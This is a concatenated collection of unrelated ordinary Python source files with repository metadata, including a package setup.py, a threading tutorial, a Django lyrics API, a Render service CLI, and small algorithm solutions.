open('pyfirth/PyFirth.py').read(),
re.M).group(1)
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="pyfirth",
version=version,
author="David Blair",
author_email="david.blair@ucsf.edu",
description="A very simple, inefficient implemention of Firth-penalized Logistic Regression for rare event data.",
long_description_content_type="text/markdown",
url="https://github.com/daverblair/PyFirth",
packages=setuptools.find_packages(),
install_requires=[
'numpy',
'pandas',
'scipy',
'statsmodels',
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| daverblair/PyFirth | setup.py | setup.py | py | 881 | python | en | code | 0 | github-code | 90 |
39871206725 | from isaac import Application
from codelets import HelloWorld
from utils import configure_websight_root, patch_capnp_paths
def main():
# patching capnp paths. Needed if using isaac python API.
patch_capnp_paths()
# creating app
app = Application(app_filename="app/graphs/graph.app.json")
# adding python codelet to the hello_node in graph
app.nodes["hello_node"].add(HelloWorld, "print")
# configuring Websight webroot and assetroot. Needed if using isaac python API.
configure_websight_root(app)
# running the application
app.run()
if __name__ == "__main__":
main()
| addyj/isaac_temp | app/main.py | main.py | py | 620 | python | en | code | 0 | github-code | 90 |
8672791092 | import threading
import time
from queue import Queue
import copy
def eat():
print(f"eat is runing")
for i in range(10):
time.sleep(0.1)
print('eating')
print('eat is end')
def multi_thread():
my_thread = threading.Thread(target=eat())
my_thread.start()
# print(threading.active_count())
# print(threading.enumerate())
# print(threading.current_thread())
print('eat_thread is running')
# todo 你这里可以看到 my_thread 还没开始执行,multi——thread 的打印已经结束。所以这里需要
# 一个序列,特别是一个thread 需要另外一个thread运行的结果的时候
#
def wake_up(arg):
print('now you is wake up')
print(arg)
# 懒床一秒钟
for i in range(2):
time.sleep(1)
print('wake up end')
def code(arg):
print('it\'s time to coding')
print(arg)
for i in range(5):
time.sleep(1)
print('code is end')
def mulit_thread_join():
print('day is start')
my_day_wake_thread = threading.Thread(
target=wake_up, name="wake", args=('hello today',))
my_day_code_thread = threading.Thread(
target=code, name="code", args=("best wish",)) # 参数传递
my_day_wake_thread.start()
my_day_wake_thread.join()
my_day_code_thread.start()
my_day_code_thread.join()
print('day is over')
def job(list_alpha, q):
q.put([i**2 for i in list_alpha])
def mulit_thread_queue():
'''把线程放到一个Queue的对象q(q.put),然后把这个线程队列放到主线程,最后把主线程运行的结果
利用q.get()取出来'''
q = Queue()
threads = []
data = [[i for i in range(10)], [j for j in range(10, 20)], [
k for k in range(100, 110)]]
for i in range(3):
t = threading.Thread(target=job, args=(data[i], q))
t.start()
threads.append(t)
for thread in threads:
thread.join()
result = []
for _ in range(3):
result.append(q.get())
print('计算结束')
print(result)
# --------------------多线程与常规方法对比---------------------------------------------
def thread_job(list_alhpa, q):
res = sum(list_alhpa)
q.put(res)
def multithreading(list_input):
'''这种方法如果是用来处理数据的话,可能效果不是很好,因为归根到底多线程还是在一个处理器上工作
除非两件完全不同的任务,而且任务中间处理器有空闲,否则的话由于GIL global interpreter lock的缘故
还是在一个线程上工作,这可能就要引入多进程的处理方法,即:使用CPU的多个核心来处理数据,这样虽然有
GIL但是核心之间是单独存在的。'''
cal_queue = Queue()
cal_thread = []
for i in range(4):
t = threading.Thread(target=thread_job, args=(
copy.copy(list_input), cal_queue), name=f"cal_{i}")
t.start()
cal_thread.append(t)
[cal_t.join() for cal_t in cal_thread]
total_result = 0
for _ in range(4):
total_result += cal_queue.get()
print(total_result)
def normal_cal(list_input):
total_result = sum(list_input*4)
print(total_result)
return total_result
A = 0
lock = threading.Lock()
def job_gil_1():
global A, lock
lock.acquire()
for i in range(10):
A += 1
lock.release()
print('job_gil_1', A)
def job_gil_2():
global A, lock
lock.acquire()
for i in range(10):
A += 10
lock.release()
print('job_gil_2', A)
def gil_entry():
'''我这里是正常的,不用lock也是可以的,可能IDE进行了整理,'''
t1 = threading.Thread(target=job_gil_1)
t2 = threading.Thread(target=job_gil_2)
t1.start()
t2.start()
t1.join()
t2.join()
print('GIL test is end')
if __name__ == "__main__":
print(f'------------simple-----------------d')
multi_thread()
print('--------------join-----------------')
mulit_thread_join()
print('------------queue---------------')
mulit_thread_queue()
print('------------gil---------------')
list_input = list(range(1000000))
time_start = time.time()
normal_cal(list_input)
print(f"常规计算方法消耗的时间:{time.time()-time_start}")
time_start = time.time()
multithreading(list_input=list_input)
print(f"多线程计算方法消耗时间:{time.time()-time_start}")
gil_entry()
| muyuchenzi/PYref | ReviewCode/QA_for_InterView/Multi_process_thread/sample_threading.py | sample_threading.py | py | 4,454 | python | en | code | 0 | github-code | 90 |
34618032000 |
# source:
# https://groups.google.com/forum/#!msg/pyqtgraph/vdYXled3uBU/9ZejuB8o8pwJ
import pyqtgraph as pg
import numpy as np
## build a QApplication before building other widgets
app=pg.mkQApp()
win = pg.GraphicsLayoutWidget()
win.show()
vb = win.addViewBox()
vb.setAspectLocked()
grad = pg.GradientEditorItem(orientation='right')
win.addItem(grad, 0, 1)
img = pg.ImageItem()
vb.addItem(img)
def update():
lut = grad.getLookupTable(512)
img.setLookupTable(lut)
grad.sigGradientChanged.connect(update)
img.setImage(np.random.normal(size=(100,100)))
app.exec_() | rvalenzuelar/pythonx | simple_image.py | simple_image.py | py | 578 | python | en | code | 0 | github-code | 90 |
14189642077 | n=0
n=input(str("n="))
n=int(n)
valor=0
valor=n*("*")
i=len(valor)
for i in range(1,len(valor)+1): #Elaboração da Escada
espaço=(len(valor)-i)*" " #Adição do espaço " " e caractere "*"
print(espaço+valor[:i])
| snarii/desafio1 | Questao1.py | Questao1.py | py | 257 | python | pt | code | 0 | github-code | 90 |
23066749745 | import datetime
from rest_framework.decorators import api_view
from django.shortcuts import HttpResponse
from rest_framework import status
from app.mail_sender import send_mail
from app.models import Lyrics
import json
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from django_files.settings import MAIL_SENDER_USER, SEND_MAIL_NEW_USER, URL_PREFIX_FOR_LINK
@api_view(['GET', 'POST', 'PUT'])
def lyrics(request):
if request.user.is_anonymous:
return HttpResponse(json.dumps({"detail": "Not authorized"}), status=status.HTTP_401_UNAUTHORIZED)
if request.method == "GET":
lyrics = Lyrics.objects.all()
#l = [serialize_rate(rate) for rate in rates]
return HttpResponse(json.dumps({"data": lyrics}), status=status.HTTP_200_OK)
if request.method == "POST":
print(request.data.get("allParagraphs", ""))
print(type(request.data.get("allParagraphs", "")))
lyric = Lyrics()
lyric.user = request.user
lyric.name = request.data.get("name", "") or "Default name"
lyric.date_added = datetime.datetime.now()
lyric.all_paragraphs = request.data.get("allParagraphs", "")
lyric.save()
return HttpResponse(json.dumps({'data': {'id': lyric.id}}), status=status.HTTP_201_CREATED)
return HttpResponse(json.dumps({"detail": "Wrong method"}), status=status.HTTP_501_NOT_IMPLEMENTED)
@api_view(['GET', 'PUT'])
def lyric(request, lyric_id):
if request.user.is_anonymous:
return HttpResponse(json.dumps({"detail": "Not authorized"}), status=status.HTTP_401_UNAUTHORIZED)
if request.method == "GET":
lyrics = Lyrics.objects.get(pk=lyric_id)
#l = [serialize_rate(rate) for rate in rates]
return HttpResponse(json.dumps({"data": {
'id': lyrics.id,
'allParagraphs': lyrics.all_paragraphs
}}), status=status.HTTP_200_OK)
if request.method == "PUT":
lyric = Lyrics.objects.get(pk=lyric_id)
lyric.all_paragraphs = request.data.get("allParagraphs", "")
lyric.save()
return HttpResponse(json.dumps({'data': {'id': lyric.id}}), status=status.HTTP_200_OK)
return HttpResponse(json.dumps({"detail": "Wrong method"}), status=status.HTTP_501_NOT_IMPLEMENTED)
| sebastian-cherny-toptal/inverse-llc | src/app/all_views/views_lyrics.py | views_lyrics.py | py | 2,290 | python | en | code | 0 | github-code | 90 |
36407495323 | """Render Command-line interface."""
import json
from typing import Any
import click
from rich.console import Console
from render_cli.output.services_output import (
output_env_vars_as_table,
output_services_as_table,
)
import render_cli.render_services as rs
from render_cli.utils import (
convert_env_var_file,
convert_from_render_env_format,
convert_to_render_env_format,
)
from . import __version__
@click.group()
@click.version_option(version=__version__)
def cli() -> None:
"""A cli to manage your Render services."""
pass
@cli.command("list")
@click.option(
"-v",
"--verbose",
is_flag=True,
help="Display full json output from render api call.",
)
def list_services(verbose) -> Any:
"""Returns a list of all services associated with your Render account.
Args:
verbose: option to return a formatted json dump of all services
instead of the default table view which just displays the
service name, service id and service url.
"""
data = rs.fetch_services()
if verbose:
click.echo(json.dumps(data, indent=4))
else:
console = Console()
click.echo("\n")
console.print(output_services_as_table(data))
@cli.command("find-service")
@click.option("-sn", "--service-name", type=str, help="Find service by name")
@click.option(
"-v",
"--verbose",
is_flag=True,
help="Display full json output from render api call.",
)
def find_service(service_name, verbose) -> Any:
"""Finds a Render service by name.
Returns information about service if found.
Args:
service_name: name of service to search for.
verbose: option to return a formatted json dump of all services
instead of the default table view which just displays the
service name, service id and service url.
"""
data = rs.find_service_by_name(service_name)
if verbose:
click.echo(json.dumps(data, indent=4))
else:
console = Console()
click.echo("\n")
console.print(output_services_as_table([data]))
@cli.command("set-env")
@click.option("-f", "--file", type=str, help="File to load env vars from")
@click.option("-sn", "--service-name", type=str, help="Render service name")
@click.option(
"-u",
"--update",
is_flag=True,
help="Will update env vars with those in file rather completely overwrite.",
)
def set_env(file: str, service_name: str, update: bool) -> Any:
"""Will set environment variables for the specified service.
This is completely replace all environment variables for a
service with those provided here.
Args:
file: path to file containing the environment variables to set.
service_name: name of service to set env vars for.
update: update flag to indicate update env vars instead of overwrite.
"""
service_id = rs.find_service_by_name(service_name)["service"]["id"]
env_vars = convert_env_var_file(file)
current_env_vars = (
convert_from_render_env_format(rs.retrieve_env_from_render(service_id))
if update
else {}
)
rs.set_env_variables_for_service(
service_id, convert_to_render_env_format({**current_env_vars, **env_vars})
)
@cli.command("list-env")
@click.option("-sid", "--service-id", type=str, help="Render service id")
@click.option("-sn", "--service-name", type=str, help="Render service name")
@click.option(
"-v",
"--verbose",
is_flag=True,
help="Display full json output from render api call.",
)
def list_env(service_id, service_name, verbose) -> Any:
"""Fetches list of environment variables of a service.
Returns and lists the environment variables associated with
the passed in service id or service name. Verbose mode
will display json.
Args:
service_id: id of service whose environment variables to find.
service_name: name of service whose environment variables to find.
verbose: option to return a formatted json dump of all environment
variable information.
"""
if not service_id:
if service_name:
service_id = rs.find_service_by_name(service_name)["service"]["id"]
else:
click.echo("Need to provide service id or service name options")
exit()
data = rs.retrieve_env_from_render(service_id)
if verbose:
click.echo(json.dumps(data, indent=4))
else:
console = Console()
click.echo("\n")
console.print(output_env_vars_as_table(data))
def recursive_help(cmd, parent=None) -> None:
"""Helper function to dump the help of a command.
Args:
cmd: command to get help for
parent: parent command
"""
ctx = click.core.Context(cmd, info_name=cmd.name, parent=parent)
print(cmd.get_help(ctx))
print()
commands = getattr(cmd, "commands", {})
for sub in commands.values():
recursive_help(sub, ctx)
@cli.command("dump-help")
def dump_help() -> None:
"""Command to dump all help screen."""
recursive_help(cli)
| mnapoleon/render-cli | src/render_cli/console.py | console.py | py | 5,117 | python | en | code | 0 | github-code | 90 |
18247886519 | S = input()
N = len(S)
def check(S1):
if S1 != S1[::-1]:
return False
else:
return True
POS = int((N-1)/2)
S1 = S[0:POS]
POS = int((N+3)/2)
S2 = S[POS-1:N]
if check(S) == False or check(S1) == False or check(S2) == False:
print('No')
else:
print('Yes')
| Aasthaengg/IBMdataset | Python_codes/p02730/s595600648.py | s595600648.py | py | 289 | python | en | code | 0 | github-code | 90 |
21708657442 | import random
# Takes in a list of data and returns a list of weighted pairs
# A weighted pair is a tuple in the form:
# (weight, item)
# weight is an integer > 1
# item can be anything
# The input list can contain two forms of data:
# 1. Individual items (default_weight is used to populate weight)
# 2. A weighted pair (weight, item)
def weighted_pairs(data, default_weight=1):
if type(data) != list:
raise TypeError("Parameter 'data' is not of type <list>")
if type(default_weight) != int:
raise TypeError("Parameter 'default_weight' is not of type <int>")
if default_weight < 1:
raise ValueError("Parameter 'default_weight' must be at least 1")
pairs = []
for d in data:
# If it isn't a tuple, it must be an individual item
if type(d) != tuple:
pairs.append((default_weight, d))
# Our item is a tuple (might be a valid weighted_pair)
else:
# Extract the possible weight
weight = d[0]
# weight must be an int (otherwise this is not a valid weighted pair)
if type(weight) != int:
pairs.append((default_weight, d))
# Type of weight was an int, fits the requirement for weighted_pair
else:
item = d[1:]
# If our item is just one element, don't save value as a list
if len(item) == 1:
item = item[0]
pairs.append((weight, item))
return pairs
def weighted_random(pairs, default_weight=1):
total = 0
# Allow non-tuples as input using default_weight for the weight
# total = sum(pairs[0] for pair in pairs)
for pair in pairs:
if type(pairs) == tuple:
total += pairs[0]
else:
total += default_weight
r = random.randint(1, total)
for (weight, value) in pairs:
r -= weight
if r <= 0:
return value | sbremner/PokemonFuzzer | modules/utils.py | utils.py | py | 2,140 | python | en | code | 0 | github-code | 90 |
29263081361 | import contextlib
import sqlite3
import sys
def query1(conn, sql=None, count=None):
if count:
sql = f"select count(*) from {count}"
cursor = conn.execute(sql)
return cursor.fetchone()[0]
def summarize_tags(dbpath):
# validate package-tags count
print("SUMMARY")
with contextlib.closing(sqlite3.connect(dbpath)) as conn:
package_tags_count = query1(conn, count="package_tags")
package_count = query1(
conn,
sql="""
select count(distinct(package)) from package_tags
""",
)
distro_count = query1(conn, count="alpine")
d_github_count = query1(
conn,
sql="""
select count(*) from alpine where
source like '%github.com/%'
""",
)
print("alpine distro:")
print(f" - {distro_count} packages")
print(f" - {d_github_count} in GitHub")
print("package_tags:")
print(f" - {package_tags_count} rows")
print(f" - {package_count} packages")
def main(dbpath):
summarize_tags(dbpath)
if __name__ == "__main__":
main(sys.argv[1])
| johntellsall/shotglass | alpine/summarize_tags.py | summarize_tags.py | py | 1,164 | python | en | code | 17 | github-code | 90 |
18483794139 | import sys
from itertools import permutations
read = sys.stdin.read
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)
INF = 1 << 60
MOD = 1000000007
def main():
N, *A = map(int, read().split())
A.sort()
vec1 = [0] * N
vec2 = [0] * N
for i in range(N - 1):
if i % 2 == 0:
vec1[i] += 1
vec1[i + 1] -= 1
vec2[i] -= 1
vec2[i + 1] += 1
else:
vec1[i] -= 1
vec1[i + 1] += 1
vec2[i] += 1
vec2[i + 1] -= 1
vec1.sort()
vec2.sort()
ans1 = ans2 = 0
for a, v1, v2 in zip(A, vec1, vec2):
ans1 += a * v1
ans2 += a * v2
print(max(ans1, ans2))
return
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03229/s877620283.py | s877620283.py | py | 796 | python | en | code | 0 | github-code | 90 |
18104087189 | import sys
readline = sys.stdin.readline
prime = set([2])
for i in range(3, 10000, 2):
for j in prime:
if i % j == 0:
break
else:
prime.add(i)
n = int(input())
cnt = 0
for i in (int(readline()) for _ in range(n)):
if i in prime:
cnt += 1
continue
for j in prime:
if i % j == 0:
break
else:
cnt += 1
print(cnt)
| Aasthaengg/IBMdataset | Python_codes/p02257/s385010368.py | s385010368.py | py | 403 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.